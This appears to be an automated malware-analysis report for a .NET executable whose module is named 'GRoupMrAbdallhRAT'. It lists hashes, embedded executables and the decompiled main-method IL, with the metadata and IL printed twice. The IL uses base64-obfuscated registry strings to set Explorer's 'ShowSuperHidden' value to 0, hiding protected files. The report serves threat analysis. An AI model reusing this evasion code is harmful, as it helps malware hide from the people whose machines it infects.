Suspicious
Suspect

5e8c000f5f5edc2a912d7f14a963182b

PE Executable
|
MD5: 5e8c000f5f5edc2a912d7f14a963182b
|
Size: 2.79 MB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

High

Hash
 Hash Value
MD5
5e8c000f5f5edc2a912d7f14a963182b
Sha1
5eacba2d117350cd3795b5007e8a04ef8366894f
Sha256
5228cdea84a04c9047fd321efcde0b729a7b2fb036328f8c68c4379ea50c9f9a
Sha384
1769349fb3a1a46bf54d776f4276187dd853570d12692a0f17f19743b9cada5378908e8374646113a4903b47370a4b90
Sha512
a6e5754aea2bb20a6554dd5737a00c7cf084045155ccd387fa80d7897b2c40721988ca7944a60ce970f13bcefd95058877d26bda9b8c637740dd0b33a4bc67b9
SSDeep
49152:035n+Docm65+Jg0ZLXVZGIOBL1oayyi3Ccy1OD8E86wlzCHoc3+1NW:03A1mq+jZOIOBLaayyidFkleI9I
TLSH
53D5B76AE3B1B319D9ED74F13D41AE3A0A6C18B5AB3813A7CD85F2034657C78A07E513

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
5e8c000f5f5edc2a912d7f14a963182b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
ID:0002
ID:0
ID:0003
ID:0
ID:0-preview.png
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
ynrkw.Resources
MRABDALLH.exe
playit.exe
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

GRoupMrAbdallhRAT
Full Name

GRoupMrAbdallhRAT
EntryPoint

System.Void Program::सकक ्दसाशरहक् श दतमह()
Scope Name

GRoupMrAbdallhRAT
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

playit
Assembly Version

0.16.3.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

19
Main Method

System.Void Program::सकक ्दसाशरहक् श दतमह()
Main IL Instruction Count

49
Main IL

ldc.i4 2000 call System.Void System.Threading.Thread::Sleep(System.Int32) call System.Boolean Program::हशूशमबरसलसकदराहशेसमद() brtrue IL_001E: call System.Void Program::बसबकब लमदहश शलेहहरह () call System.Int32 System.Environment::get_ExitCode() call System.Void System.Environment::Exit(System.Int32) call System.Void Program::बसबकब लमदहश शलेहहरह () call My.MyComputer My.MyProject::शलदह रह हमअूसअेहअाीह() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cRXhwbG9yZXJcQWR2YW5jZWQ= call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.0 <null> ldloc.0 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr U2hvd1N1cGVySGlkZGVu call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) ldc.i4.1 <null> box System.Int32 ldc.i4.0 <null> call System.Boolean Microsoft.VisualBasic.CompilerServices.Operators::ConditionalCompareObjectEqual(System.Object,System.Object,System.Boolean) brfalse IL_009B: leave IL_00B1 ldloc.0 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr U2hvd1N1cGVySGlkZGVu call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldc.i4.0 <null> box System.Int32 callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) leave IL_00B1: ldnull dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_00B1: ldnull ldnull <null> call System.Object Program::लक त देर हततशलरबसम्(System.Object) pop <null> ret <null>
Module Name

GRoupMrAbdallhRAT
Full Name

GRoupMrAbdallhRAT
EntryPoint

System.Void Program::सकक ्दसाशरहक् श दतमह()
Scope Name

GRoupMrAbdallhRAT
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

playit
Assembly Version

0.16.3.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

19
Main Method

System.Void Program::सकक ्दसाशरहक् श दतमह()
Main IL Instruction Count

49
Main IL

ldc.i4 2000 call System.Void System.Threading.Thread::Sleep(System.Int32) call System.Boolean Program::हशूशमबरसलसकदराहशेसमद() brtrue IL_001E: call System.Void Program::बसबकब लमदहश शलेहहरह () call System.Int32 System.Environment::get_ExitCode() call System.Void System.Environment::Exit(System.Int32) call System.Void Program::बसबकब लमदहश शलेहहरह () call My.MyComputer My.MyProject::शलदह रह हमअूसअेहअाीह() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cRXhwbG9yZXJcQWR2YW5jZWQ= call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.0 <null> ldloc.0 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr U2hvd1N1cGVySGlkZGVu call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) ldc.i4.1 <null> box System.Int32 ldc.i4.0 <null> call System.Boolean Microsoft.VisualBasic.CompilerServices.Operators::ConditionalCompareObjectEqual(System.Object,System.Object,System.Boolean) brfalse IL_009B: leave IL_00B1 ldloc.0 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr U2hvd1N1cGVySGlkZGVu call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldc.i4.0 <null> box System.Int32 callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) leave IL_00B1: ldnull dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_00B1: ldnull ldnull <null> call System.Object Program::लक त देर हततशलरबसम्(System.Object) pop <null> ret <null>
5e8c000f5f5edc2a912d7f14a963182b (2.79 MB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙